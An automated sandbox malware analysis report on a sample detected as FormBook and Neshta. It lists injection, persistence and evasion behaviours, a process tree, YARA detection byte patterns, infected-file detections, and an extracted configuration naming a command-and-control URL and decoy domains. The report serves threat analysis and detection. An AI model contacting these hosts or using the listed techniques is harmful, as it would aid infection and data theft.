Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report vi0EwpbUht

Overview

General Information

Sample Name:vi0EwpbUht (renamed file extension from none to exe)
Analysis ID:432848
MD5:f478c15f5affd8359762b8c6b0e913a4
SHA1:05b36949abd35a132488158f38149c7b582c8d3a
SHA256:e355ac0da4996011e91f28b11e03c44d54606ae4ceb0bc4f6d0a0edc4b3410ed
Tags:exeneshta
Infos:

Most interesting Screenshot:

Detection

FormBook Neshta
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Neshta
C2 URLs / IPs found in malware configuration
Creates an undocumented autostart registry key
Drops PE files with a suspicious file extension
Drops executable to a common third party application directory
Drops executables to the windows directory (C:\Windows) and starts them
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample is not signed and drops a device driver
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses netstat to query active network connections and open ports
AV process strings found (often used to terminate AV products)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • vi0EwpbUht.exe (PID: 7096 cmdline: 'C:\Users\user\Desktop\vi0EwpbUht.exe' MD5: F478C15F5AFFD8359762B8C6B0E913A4)
    • vi0EwpbUht.exe (PID: 6184 cmdline: 'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe' MD5: 4A10F66447AAF017229FF618AAB923E3)
      • vi0EwpbUht.exe (PID: 6372 cmdline: 'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe' MD5: 4A10F66447AAF017229FF618AAB923E3)
        • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • svchost.com (PID: 3728 cmdline: 'C:\Windows\svchost.com' 'C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe' MD5: 713C9023AF9454658983BDEEC3B3F4D4)
            • elxhan.exe (PID: 1144 cmdline: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe MD5: 4A10F66447AAF017229FF618AAB923E3)
              • elxhan.exe (PID: 5572 cmdline: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe MD5: 4A10F66447AAF017229FF618AAB923E3)
          • NETSTAT.EXE (PID: 5948 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
            • cmd.exe (PID: 4140 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 4592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • help.exe (PID: 5944 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.personalizedyardsigns.com/xkcp/"], "decoy": ["plcnotary.com", "pennywisebusiness.net", "negatzone.com", "hangclinic.com", "choice-home-warranty-review.com", "oslojistas.com", "keguanchina.com", "amazoncarbonhub.com", "myworkaccident.com", "shipu299.com", "henselectrlc.com", "store55588.com", "11ncbee.net", "reissantorini.com", "karta.gold", "goldenstatesurplus.net", "soslifefood.com", "bis-adapter.net", "harrywalia.com", "myboutiqueflowers.com", "rareearthmetalrefining.com", "triathletestrength.com", "jumtix.xyz", "shropshirepaddleboarding.com", "promocaomercadolivre.com", "tetratechinstruction.com", "emergingleadership.coach", "aresponsibleperson.net", "gethesspp.com", "zicanotes.com", "lance2375problems.com", "sxkeyuanda.com", "hotradio1.com", "dcsingersforhire.com", "shophigh5.com", "heaustralia.site", "bandlaser.com", "pucksbar.net", "financialdy.com", "digech.com", "livablelandbuyer.com", "bccluster.com", "xn--o39ay81ahtag62aba.com", "petalumaroofing.com", "handmadebyclydelle.com", "thecanineharness.com", "83twistleton.com", "shardulwakade.net", "shopcovetandcrave.com", "babateeconsult.com", "plancougar.com", "buyketoeasy.com", "dccustomcreation.com", "nutellajam.com", "kaiocarvalho.com", "treschicbeautyloft.com", "gofornye.com", "agileintelligence.coach", "poetryartists.com", "teailn.com", "letsreflectonline.net", "uggoutletosterreich.com", "metododgl.com", "centurygreatpath.info"]}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
vi0EwpbUht.exeMAL_Neshta_GenericDetects Neshta malwareFlorian Roth
  • 0xa0e7:$x1: the best. Fuck off all the rest.
  • 0xa1a8:$x2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
  • 0xa108:$s1: Neshta
  • 0xa113:$s2: Made in Belarus.
  • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
  • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
  • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXEMAL_Neshta_GenericDetects Neshta malwareFlorian Roth
  • 0xa0e7:$x1: the best. Fuck off all the rest.
  • 0xa1a8:$x2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
  • 0xa108:$s1: Neshta
  • 0xa113:$s2: Made in Belarus.
  • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
  • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
  • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exeMAL_Neshta_GenericDetects Neshta malwareFlorian Roth
  • 0xa0e7:$x1: the best. Fuck off all the rest.
  • 0xa1a8:$x2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
  • 0xa108:$s1: Neshta
  • 0xa113:$s2: Made in Belarus.
  • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
  • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
  • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXEMAL_Neshta_GenericDetects Neshta malwareFlorian Roth
  • 0xa0e7:$x1: the best. Fuck off all the rest.
  • 0xa1a8:$x2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
  • 0xa108:$s1: Neshta
  • 0xa113:$s2: Made in Belarus.
  • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
  • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
  • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeMAL_Neshta_GenericDetects Neshta malwareFlorian Roth
  • 0xa0e7:$x1: the best. Fuck off all the rest.
  • 0xa1a8:$x2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
  • 0xa108:$s1: Neshta
  • 0xa113:$s2: Made in Belarus.
  • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
  • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
  • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
C:\Program Files (x86)\Microsoft Office\Office16\lync99.exeMAL_Neshta_GenericDetects Neshta malwareFlorian Roth
  • 0xa0e7:$x1: the best. Fuck off all the rest.
  • 0xa1a8:$x2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
  • 0xa108:$s1: Neshta
  • 0xa113:$s2: Made in Belarus.
  • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
  • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
  • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
Click to see the 107 entries

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 38 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      7.2.elxhan.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        7.2.elxhan.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        7.2.elxhan.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18409:$sqlite3step: 68 34 1C 7B E1
        • 0x1851c:$sqlite3step: 68 34 1C 7B E1
        • 0x18438:$sqlite3text: 68 38 2A 90 C5
        • 0x1855d:$sqlite3text: 68 38 2A 90 C5
        • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
        1.2.vi0EwpbUht.exe.400000.0.unpackMAL_Neshta_GenericDetects Neshta malwareFlorian Roth
        • 0xa0e7:$x1: the best. Fuck off all the rest.
        • 0xa1a8:$x2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
        • 0xa108:$s1: Neshta
        • 0xa113:$s2: Made in Belarus.
        • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
        • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
        • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
        1.2.vi0EwpbUht.exe.400000.0.unpackJoeSecurity_NeshtaYara detected NeshtaJoe Security
          Click to see the 37 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus / Scanner detection for submitted sampleShow sources
          Source: vi0EwpbUht.exeAvira: detected
          Antivirus detection for dropped fileShow sources
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeAvira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeAvira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeAvira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeAvira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeAvira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeAvira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeAvira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeAvira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeAvira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeAvira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeAvira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeAvira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeAvira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeAvira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeAvira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeAvira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeAvira: detection malicious, Label: W32/Neshta.A
          Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exeAvira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeAvira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeAvira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exeAvira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\AutoIt3\Uninstall.exeAvira: detection malicious, Label: W32/Neshta.A
          Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exeAvira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeAvira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeAvira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeAvira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeAvira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeAvira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeAvira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeAvira: detection malicious, Label: W32/Neshta.A
          Found malware configurationShow sources
          Source: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.personalizedyardsigns.com/xkcp/"], "decoy": ["plcnotary.com", "pennywisebusiness.net", "negatzone.com", "hangclinic.com", "choice-home-warranty-review.com", "oslojistas.com", "keguanchina.com", "amazoncarbonhub.com", "myworkaccident.com", "shipu299.com", "henselectrlc.com", "store55588.com", "11ncbee.net", "reissantorini.com", "karta.gold", "goldenstatesurplus.net", "soslifefood.com", "bis-adapter.net", "harrywalia.com", "myboutiqueflowers.com", "rareearthmetalrefining.com", "triathletestrength.com", "jumtix.xyz", "shropshirepaddleboarding.com", "promocaomercadolivre.com", "tetratechinstruction.com", "emergingleadership.coach", "aresponsibleperson.net", "gethesspp.com", "zicanotes.com", "lance2375problems.com", "sxkeyuanda.com", "hotradio1.com", "dcsingersforhire.com", "shophigh5.com", "heaustralia.site", "bandlaser.com", "pucksbar.net", "financialdy.com", "digech.com", "livablelandbuyer.com", "bccluster.com", "xn--o39ay81ahtag62aba.com", "petalumaroofing.com", "handmadebyclydelle.com", "thecanineharness.com", "83twistleton.com", "shardulwakade.net", "shopcovetandcrave.com", "babateeconsult.com", "plancougar.com", "buyketoeasy.com", "dccustomcreation.com", "nutellajam.com", "kaiocarvalho.com", "treschicbeautyloft.com", "gofornye.com", "agileintelligence.coach", "poetryartists.com", "teailn.com", "letsreflectonline.net", "uggoutletosterreich.com", "metododgl.com", "centurygreatpath.info"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeReversingLabs: Detection: 95%
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeReversingLabs: Detection: 95%
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeReversingLabs: Detection: 95%
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeReversingLabs: Detection: 96%
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeReversingLabs: Detection: 100%
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeMetadefender: Detection: 91%Perma Link
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeReversingLabs: Detection: 100%
          Multi AV Scanner detection for submitted fileShow sources
          Source: vi0EwpbUht.exeMetadefender: Detection: 91%Perma Link
          Source: vi0EwpbUht.exeReversingLabs: Detection: 100%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000001.366394202.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.561947063.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.337333387.00000000030E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.476443406.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.475830618.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.373308889.00000000022B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.584337141.0000000002680000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.561291954.0000000000930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 7.2.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.1.elxhan.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.elxhan.exe.22b0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.1.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.vi0EwpbUht.exe.30e0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.elxhan.exe.22b0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.elxhan.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.vi0EwpbUht.exe.30e0000.4.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJoe Sandbox ML: detected
          Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\AutoIt3\Uninstall.exeJoe Sandbox ML: detected
          Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJoe Sandbox ML: detected
          Machine Learning detection for sampleShow sources
          Source: vi0EwpbUht.exeJoe Sandbox ML: detected
          Source: 1.2.vi0EwpbUht.exe.400000.0.unpackAvira: Label: W32/Neshta.A
          Source: 7.1.elxhan.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 17.2.NETSTAT.EXE.292ed78.2.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 5.2.svchost.com.400000.0.unpackAvira: Label: W32/Neshta.A
          Source: 3.1.vi0EwpbUht.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.2.elxhan.exe.22b0000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.2.vi0EwpbUht.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.2.elxhan.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 17.2.NETSTAT.EXE.328f834.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 2.2.vi0EwpbUht.exe.2ff0000.3.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 5.0.svchost.com.400000.0.unpackAvira: Label: W32/Neshta.A
